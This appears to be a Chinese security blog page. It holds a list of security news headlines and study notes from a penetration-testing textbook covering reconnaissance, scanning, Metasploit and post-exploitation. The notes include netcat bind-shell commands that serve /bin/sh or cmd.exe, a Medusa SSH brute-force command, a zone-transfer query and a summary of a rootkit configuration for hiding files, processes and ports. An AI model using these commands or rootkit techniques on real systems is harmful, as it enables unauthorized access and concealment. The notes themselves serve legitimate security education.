16 Apr 2018
Update: hash.py Version 0.0.3
DCShadow
UPnProxy攻击已让400款SOHO路由机型受影响,6多万台设备已被攻击
如何用ESP8266制作密码获取测试WIFI神器
SecWiki News 2018-04-16 Review
暴风等知名软件广告页遭挂马攻击,十多万用户被病毒感染
双枪2驱动分析
Thinkphp3.2.3最新版update注入漏洞
Intel SPI Flash Flaw让攻击者改变或删除BIOS / UEFI固件
栈溢出基础(一)
攻击基础设施日志记录 - Part2:日志聚合
浏览器的自动填充功能真的安全吗?我看未必!
字体沦为“圈钱“工具 勒索软件无孔不入
CSRF实战
Veil-Evasion+PyJoiner捆绑两个EXE免杀思路分享
开源工具 | 宜信漏洞管理平台“洞察”开源啦!
Linux系统ETN挖矿病毒实例分析
XSS的另一种利用思路
Microsoft Outlook漏洞CVE-2018-0950分析
Drupal爆远程代码执行漏洞,腾讯云网站管家率先发布应对策略
Windows漏洞利用开发教程Part 2:Short Jump
打造kali一样的parrotOS,从放弃kali到投靠鹦鹉
“爱马仕”敲诈者:敲诈者中的奢侈品
python-i春秋验证码识别
Linux花式读取文件内容的几个命令
截图自动翻译OCR的Python实现
重新写了下之前发布的struts2漏洞扫描工具,分享一下
Blockchain can be Blocked(比特币网络通讯底层漏洞详解)
对某cms过滤函数的突破及思考
Ubuntu本地提权漏洞(CVE-2017-16995)
X-WAF:一款适合练手的云WAF
tx_king源码免杀第二课
tx_King渗透基础教程(踩点)
A malicious word document with a VBA form
snallygaster – Scan For Secret Files On HTTP Servers
How I hacked companies related to the crypto currency and earned $60,000
Spring Data Commons组件远程代码执行漏洞(CVE-2018-1273) 分析过程
Seebug、structs、cve漏洞实时监控推送系统
How to kill a (Fire)fox
defineClass在java反序列化当中的利用
Exim Off-by-one(CVE-2018-6789)漏洞复现分析
THINKPHP3.2开发框架 SQL注入漏洞
Drupal远程代码执行漏洞(CVE-2018-7600)分析
Polymorph: A Real-Time Network Packet Manipulation Framework
06 Apr 2018
CHAPTER7 Post Exploitation and Maintaining Access with Backdoors, Rootkits, and Meterpreter
1、netcat
1、“聊天”
Server: nc –l –p 1337
Client: nc 192.168.18.132 1337
建立一个TCP连接
2、传输文件
server: nc –l –p 7777 > virus.exe
client: nc 172.16.45.129 7777 < virus.exe
3、获取banner信息
nc 192.168.18.132 50001
输入一些内容,查看返回信息
4、正反向shell
Server:
nc –l –p 12345 –e /bin/sh
nc.exe –L –p 12345 c:\Windows\System32\cmd.exe
Client:
nc 192.168.1.1 12345
2、加密版的netcat:Cryptcat
使用-k选项修改默认密钥
Server:cryptcat –l –p 5757
Client;cryptcat 192.168.18.132 5757
3、Rootkits - Hacker Defender
配置文件:
[Hidden Table]. Any files, directories, or folders listed under this heading will be hidden from the explorer and file manager used by Windows.
[Hidden Processes] Each of the processes listed here will be hidden from the local user when they view currently running processes with the task manager.
[Root Processes] Any programs listed here will be allowed to view and interact with programs on the system, including those listed in the [Hidden Table] and [Hidden Processes] tab.
[Hidden Services] section will hide each of the listed services. Again, when interacting with the task manager, any program listed here will be concealed from the “services” list.
[Hidden RegKeys] section can be used to camouflage each of these keys. You will need to make sure that you list them all in order to avoid detection.
[Hidden RegValues] Entering information here will hide individual values rather than the entire key.
[Startup Run] is a list of programs that will be automatically run once Hacker Defender has been started.
You can use the [Free Space] section to force the computer to “add back” the amount of free space that you used.
If you know of ports that you plan to open, you can list them under the [Hidden Ports] section.
4、Meterpreter
常用命令
CHAPTER 8 Wrapping Up the Penetration Test
1、Executive Summary
The executive summary should be a very brief overview of your major findings.
If vulnerability and exploits were discovered, the executive summary needs to focus on explaining how these findings impact the business.
2、Detailed Report
This report will include a comprehensive list of your findings as well as the technical details.
Always present critical findings first.
The idea and use of proof-of-concept screenshots is a powerful tool and should be incorporated into the penetration testing report whenever possible.
Whenever possible, when writing the penetration testing report, you need to include mitigations and suggestions for addressing the issues you discovered.
3、Raw Output
[optional]
4、note:
If you have agreed to deliver the document electronically, you will need to ensure that the penetration testing report is encrypted and remains confidential until it arrives in the client’s hands.
06 Apr 2018
CHAPTER4 Exploitation
1、渗透神器 Metasploit
基本用法:
msf> msfconsole
msf> search missing_patch_number (or CVE)
use exploit_name_and_path
msf> show payloads
msf> set payload path_to_payload
msf> show optionsA
msf> set option_name desired_option_input
msf> exploit
一份不错的教程:
Metasploit Unleashed https://www.offensive-security.com/metasploit-unleashed/
2、在线各类服务密码破解
Medusa
medusa –h 192.168.18.132 –u ownedb –P /usr/share/john/password.lst –M ssh
THC Hydra https://www.thc.org/thc-hydra/
05 Apr 2018
CHAPTER 2 Reconnaissance
1、什么是Reconnaissance?
侦察(Reconnaissance)也叫做信息搜集(Information gathering),目的是搜集目标系统的详细信息。这应该是渗透测试中花费世家最长的阶段,往往却被忽略或看轻,很多失败的渗透测试都是因为前期的信息搜集不足造成的。
2、Active reconnaissance
主动侦察需要直接访问目标系统,比如对目标网站做镜像,可以使用的工具有 HTTrack、wget等。
3、Passive reconnaissance
被动侦察是通过第三方哈寻目标系统的信息,不直接与目标系统交互。
3.1、Search engine
Google Hacking
Googole hacking基本用法:
site:dsu.edu pat engebretson
allintitle:index of
inurl:admin
cache:syngress.com
filetype:pdf
site:dsu.edu filetype:pptx
更全面的Google hacking技术参考;
Google Hacking for Penetration Testers
Google Dorks Google Hacking Database (GHDB)
other search engines: Yahoo, Bing, Ask, Dogpile
Newsgroups and Bulletin Board Systems like UseNet and Google Groups
Support forums, Internet Relay Chart
social media like Facebook and Twitter
job hunting website
3.2、E-mail Addresses
工具:The Harvester
3.3、whois
whois域名
通过对域名的whois查询,可以知道域名的注册人、权威DNS服务器等信息。
命令行工具:whois target_domain
在线查询网站:http://www.whois.net
whois ip
通过对IP的whois查询,可以知道该IP所在的IP块、IP拥有者等信息。工具同上。
3.4、网站综合信息查询 Netcraft
3.5、IP与域名之间的转换
host target_hostname
host IP_address
3.6、DNS信息
nslookup
nslookup
\> server 8.8.8.8
\> set type=any
\> baidu.com
dig
dig @target_ip
dig @192.168.1.23example.com –t AXFR
fierce
./fierce.pl –dns trustedsec.com
3.7、E-mail Servers
Send an e-mail to the organization with an empty .bat file or a nonmalicious .exe file like calc.exe
Analysis the header and body of the rejected message
3.8、Metadata
MetaGooFil
./metagoofil.py -d syngress.com –t pdf,doc,xls,pptx –n 20 -o files –f results.html
3.9、综合信息搜集工具
ThreatAgent
FOCA
SearchDiggity
Maltego
Robtex
CHAPTER 3 Scanning
1、Pings and Ping Sweeps
ping
ping target_ip
fping
fping –a –g 172.16.45.1 172.16.45.254>hosts.txt
2、Port&Service Scanning
nmap
nmap –sT -p- -Pn 192.168.18.132
nmap –sT -p- -Pn 192.168.18.1-254
nmap –sS -p- -Pn 192.168.18.132
nmap –sU 192.168.18.132
nmap –sUV 172.16.45.135
nmap –sX -p- -Pn 192.168.18.132
nmap –sN -p- -Pn 192.168.18.132
nmap --script banner 192.168.18.132
nmap --script vuln 192.168.18.132
3、Vulnerability Scanning
Nessus https://www.tenable.com/downloads/nessus
4、 其他扫描工具
OpenVAS
NeXpose
Metasploit
Core Impact
Canvas
05 Apr 2018
CHAPTER 1 What is Penetration Testing?
1、什么是渗透测试?
Penetration testing can be defined as a legal and authorized attempt to locate and successfully exploit computer systems for the purpose of making those systems more secure.
渗透测试是通过攻击和入侵系统,发现系统存在的安全问题,帮助用户解决这些问题,从而提高系统的安全性。这是一种合法的、具有授权的网络攻击行为。
2、渗透测试的技术、方法和工具与现实中攻击者所使用的是相同的。
The general idea is to find security issues by using the same tools and techniques as an attacker.
3、与渗透测试相同的概
Pen testing
PT
Hacking
Ethical hacking
White hat hacking
Offensive security
Red teaming
4、白帽子与黑帽子的区别?
At its core, these differences can be boiled down to three key points: authorization, motivation, and intent.
5、白盒测试与黑盒测试
White box penetration testing, also known as “overt” testing, is very thorough and comprehensive.
白盒测试,用户提供目标系统的详细信息,比如网络拓补结构、服务器配置、应用系统源代码等,渗透人员根据这些信息寻找系统安全问题。
Black box penetration testing, also known as “covert” testing, employs a significantly different strategy.
黑盒测试,渗透人员对目标系统几乎一无所知,可能只知道目标的企业名称或者一个域名,剩下的信息需要渗透人员自己去搜集。这种测试更像是现实中的网络攻击和入侵行为。
6、 渗透测试的流程
已经有很多成熟的渗透测试方法论,不过都大同小异。这本书将其简化为四个步骤,如下:
这几个步骤并不是依次线性地做完即可,而应该是随着测试的进行与深入,循环进行的,如下: